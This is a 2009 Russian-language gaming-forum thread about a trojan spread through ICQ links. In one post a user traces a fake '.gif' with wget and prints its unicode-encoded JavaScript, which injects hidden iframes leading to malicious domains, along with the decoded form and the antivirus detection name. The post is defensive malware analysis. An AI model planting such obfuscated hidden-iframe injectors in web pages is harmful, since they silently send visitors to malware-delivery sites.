80 ответов в теме

[DarkPhoenix]

Не в чебураторе дело все-таки. Или это другой троян, или это эта самая картинка, открытая в ИЕ.

[Nares]

У меня не было чебуратора, но тут вылезло про ежика в тумане там где у вас чебур. Пора форматировать диск? Браузер мозилла(

Сообщение отредактировал Nares: 28 April 2009 - 23:54

[Orgazmaat]

Да, просвятите народ, а то чебурашки/ежики или вирусы/трояны в картинках - паниковать уже можно ?
PS когда читал тему в первый раз ежика не было.

[Мир]

PS когда читал тему в первый раз ежика не было.

Дочитался до ежиков, ггг

Надо для профилактики пару дней еву продержать в онлайне перманентно )

Сообщение отредактировал Мир: 29 April 2009 - 0:12

[Orgazmaat]

Дочитался до ежиков, ггг

Надо для профилактики пару дней еву продержать в онлайне перманентно )

И ?
Разве , если кто-то другой зайдет ,тебя не выкинет . Мне кажется , что максимум - узнаешь когда заходили , + в "перманентном" онлайне надо как-то с ДТ решать.

[Брат]

Похоже, для Евы надо отдельный комп держать.
Реальный наплыв троянов идет. Похоже безработные программеры решают денежные проблемы во время кризиса =)

Сообщение отредактировал Брат: 29 April 2009 - 0:26

[Maba]

Trojan-Clicker.HTML.IFrame.bk
вирус старый (2007 год), относился к разряду Internet-Clicker возможно его переприспособили на новый лад

действовал он так:
ссылка на ресурс (недавно тоже видел ссылку на эту "машинку" - пробегало от кого-то по аське) имеет в себе скрытый фрэйм (как бы еще одно окно браузера, только мы его не видим) с определенным адресом, по которому находится страничка-менеджер, содержащая дальнейшие инструкции (на платформенно-независимом языке), которые выполнит браузер, открывший данную страничку, в 2007 году она заливала на комп во временный каталог исполняемый Win32 файл и запускала его (судя по всему это была программка из разряда Trojan-Downloader или Trojan-Dropper), там же находилась еще одна ссылка на следующую страничку со следующей порцией инструкций (и так далее по цепочке, длина которой может быть любой)


для того, чтобы что-либо увести у вас из EVE - инструкций, написаных для браузера однозначно недостаточно, необходимо заслать на ваш компьютер и запустить исполняемый файл из разряда клавиатурных шпионов, который перехватит и сворует у вас вводимые с клавиатуры при логине в игру пароли, а заодно и файл со списком использованых аккаунтов, что сохраняет клиент игры (также возможен вариант установки шпиона ввиде плагина для браузера, который будет ждать пока вы зайдете в личный кабинет на офф-сайте и сворует логин/пароль в этот момент) - любой современный браузер как минимум спрашивает подтверждения на подобные действия, за исключением случаев, когда у вас посещаемый сайт находится в списке довененных сайтов (добавляется пользователем вручную), либо подписан сертификатом, который пользователь (также вручную) установил в раздел доверенных сертификатов

мораль такова - никогда не жмите OK не прочитав о чем просят, если не понимаете что предлагают, то жмите "отмену" или вовсе закройте окно браузера - 100% гарантия, что корме вирусов и троянов нефиг ловить на подобных страничках

P.S. "чебурашки" и "ежики в тумане" на русском сайте Google никакого отношения к вирусу не имеют, это плод труда чисто национальных укуренных ПиАрщиков, возможно все как раз наоборот - вирус подсовывает вместо Google (ну и других популярных поисковиков) их "подправленные" варианты, внешне выглядящие точно так же, но вот ссылки ведут уже совсем по другим адресам, просто на гугле эта дурацкая реклама есть не всегда или динамически меняется, а на подставном - она всегда в наличии и одна и та же

Сообщение отредактировал Maba: 29 April 2009 - 4:55

[4eJl]

Мле паникеры, правду говорят паника заразна, чуть сам не поддался

Сообщение отредактировал 4eJl: 29 April 2009 - 3:14

[Maba]

вот что удалось нарыть по той ссылке, что пробегала недавно по аськам с предложением заценить "клевую тачку"

http://yehoshua-m.com/images/auto.gif

--04:26:09--  http://yehoshua-m.com/images/auto.gif
		   => `auto.gif'
Resolving yehoshua-m.com... done.
Connecting to yehoshua-m.com[69.65.33.41]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 736 [text/html]

	0K													   100%	4.61 KB/s

04:26:10 (4.61 KB/s) - `auto.gif' saved [736/736]

содержимое этого ".gif" по сути - HTML без хедера с линком на картинку и строкой Java-Script, записаной в уникод-последовательностях

<img src="WorleyVision5.jpg">  <script type="text/javascript">document.write('
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022
\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u006e\u0065\u006e\u0065
\u0074\u007a\u002e\u0063\u006f\u006d\u002f\u0073\u0074\u0061\u0074\u0073\u002f
\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c
\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f
\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
</script>

на нормальном языке она читается как

<iframe src="http://linenetz.com/stats/ru1.php" style="display:none"></iframe>

надо же, намек на отечественные разработки :) сдернем этот ru1.php

--04:19:31--  http://linenetz.com/stats/ru1.php
		   => `ru1.php'
Resolving linenetz.com... done.
Connecting to linenetz.com[213.182.197.236]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 604 [text/html]

	0K													   100%  589.84 KB/s

04:19:31 (589.84 KB/s) - `ru1.php' saved [604/604]

он содержит нижеследующее и детектится "касперским" как:
Trojan program Trojan-Clicker.HTML.IFrame.bk - File: D:\Temp\vir\ru1.php

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061
\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a
\u002f\u002f\u006d\u0069\u006c\u006c\u0069\u006f\u006e\u002d\u0064\u006f\u006c
\u006c\u0061\u0072\u0073\u002e\u0063\u006e\u002f\u0061\u0064\u0077\u006f\u0072
\u0064\u0073\u0032\u0032\u0032\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070
\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069
\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c
\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
</script>

что переводится как

<iframe src="http://million-dollars.cn/adwords222/index.php" style="display:none"></iframe>

а вот дальше с наскоку проследить не удалось, wget проскакивает по этому "миллион долларз" и его швыряет по референсу на гугль :(

--04:11:28--  http://million-dollars.cn/adwords222/index.php
		   => `index.php'
Resolving million-dollars.cn... done.
Connecting to million-dollars.cn[61.235.117.67]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://google.com/ [following]
--04:11:29--  http://google.com/
		   => `index.html'
Resolving google.com... done.
Connecting to google.com[74.125.67.100]:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.google.com/ [following]
--04:11:29--  http://www.google.com/
		   => `index.html'
Resolving www.google.com... done.
Connecting to www.google.com[74.125.43.99]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.google.ru/ [following]
--04:11:30--  http://www.google.ru/
		   => `index.html'
Resolving www.google.ru... done.
Connecting to www.google.ru[74.125.43.147]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

	0K .....													 5.53 MB/s

04:11:30 (5.53 MB/s) - `index.html' saved [5794]

больше под рукой ничего нет, так что посмотреть чем занимается скрипт
million-dollars.cn/adwords222/index.php не вышло

зато вот, что поведал про домен linenetz.com сайтик http://openrbl.org

IP: 213.182.197.236
LATVIA / RIGA, RIGA (lat. 56.95, long. 24.1, time zone +02:00)
Net Speed : COMP
ISP : REAL_HOST_NET
IDD Code 371

JUNIK-RIGA-LV JUNIKNET Autonomous System JUNIK ISP Network Riga, LATVIA

данный IP известен также как:

7ioi.biz
8addition.org
add-content-filter.info
b9n.org
coloer.biz
fiolan.com
forka.org
fp3s.biz
ldj5.biz
lj3q.biz
mail.8addition.org
people-vip.ru
www.lj3q.biz

Сообщение отредактировал Maba: 29 April 2009 - 8:00

[DarkRai]

Гы а у меня Ёжик

Такое чувство что за мной где-то подглядели

зы. тыцать естессно не стал xD несмотря на то что мну йожыкафф оччень любед=))))
ззы. пойду-ка проверю свой акк лол

Сообщение отредактировал DarkRai: 29 April 2009 - 4:40

[Маэстро]

Кому нибудь ответило ССР?

[WildFrag]

Файрвол и антивирь. Даже если случайно что-то зацепите то файрвол заблочит когда троян попробует либо сам передать либо прицепиться для этого к какому-нибудь процессу.
Многие видимо считают встроенную в винду жалкую пародию файрволом, не обольщайтсь

[gobobo]

+1 виноваты все

[Morgano]

И что все пароль руками набирают?

[Flint]

+1 виноваты все

У лорда грубо это выраженно но по сути верно. У большинства фаеры настроены на автоматический(интеллектуальный) режим. То бишь сами решают что выпустить в инет а что нет.
Переключите его в режим вопроса. Тогда на любое изменение уже запускавшейся проги или новый процесс будет вопрос - пропустить или нет. У меня реагирует на любой апдейт ЕВЕМона, ЕФТ и самой ЕВЕ.
И вы удивитесь скока прог и игр пытаются без вашего ведома залезть в инет. Из лучших побуждений разумеется

Конкрено эта байда по аське не приходила но лазая по левым сайтам пару раз цеплял скриптами заразу. Которая сразу же пыталась куда то там залезть.

Кроме того полезно знать что у вас висит в памяти, какие процессы и сервиса. Это не так сложно как кажется. Можно делать скрины что висит в памяти и сравнивать с ранними. Я так научил человека совсем далекого от компов выявлять "засланцев"

[Pointer]

По поводу ежика и чебурашки, по-моему это сам гугль что-то мудрит.
Открыл на ВМ свежую ВинХП СП3, на которая просто была установлена и тут-же закрыта.
Создал на ней файлик xxx1.js с таким содержимым:

var url = "http://www.google.ru";
var filename = "xxx1.txt";

var Http = new ActiveXObject("MSXML2.ServerXMLHTTP");

Http.open("GET", url, false);

Http.setRequestHeader("Accept", "*/*")
Http.setRequestHeader("User-Agent", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)")
Http.setRequestHeader("Accept-Charset", "windows-1251")
Http.send();
var Html = Http.responseText;

var fso = new ActiveXObject("Scripting.FileSystemObject");
if (fso.FileExists(filename))
	fso.DeleteFile(filename);

var a = fso.CreateTextFile(filename, true);
a.Write(Html);
a.Close();

Запустил раз 10, в html-коде нет слова "Новинка!".

Создаю файлик xxx2.js с таким содержимым:

var url = "http://www.google.ru";
var filename = "xxx2.txt";

var Http = new ActiveXObject("MSXML2.ServerXMLHTTP");

Http.open("GET", url, false);

Http.setRequestHeader("Accept", "*/*")
Http.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2")
Http.setRequestHeader("Accept-Charset", "windows-1251")
Http.send();
var Html = Http.responseText;

var fso = new ActiveXObject("Scripting.FileSystemObject");
if (fso.FileExists(filename))
	fso.DeleteFile(filename);

var a = fso.CreateTextFile(filename, true);
a.Write(Html);
a.Close();

Запустил раз 10, в html-коде всегда есть "Новинка!" со ссылкой и ежиком в тумане.

Лохов всегда кидали и будут кидать. Зачем их учить? Умные учатся на других, дураки на себе. Ну если человек берет калькулятор, чтобы 300 разделить на 15, то все о нем ясно.
Какой файрвол? Чтобы они себе инет заблочили и провайдера материли со слюнями? Если плохо с мозгами, то вокруг виноваты ВСЕ, кроме персонала.

И это говорит чел, которого дважды кинул на перса с десятками СП и кучей исков один и тот-же человек. БУ-ГО-ГА

[NightHawk]

/офтоп вкл
Комп "железяка" Антивирей нет, фаерволов нет, населена вирусами...
/офтоп выкл

А у меня на домашней тачке нету ни антивиря, ни фаервола. Все лень поставить. Но нету ни вирусов ни другой злобной фигни. Главное не лазить по сомнительным сайтам ж)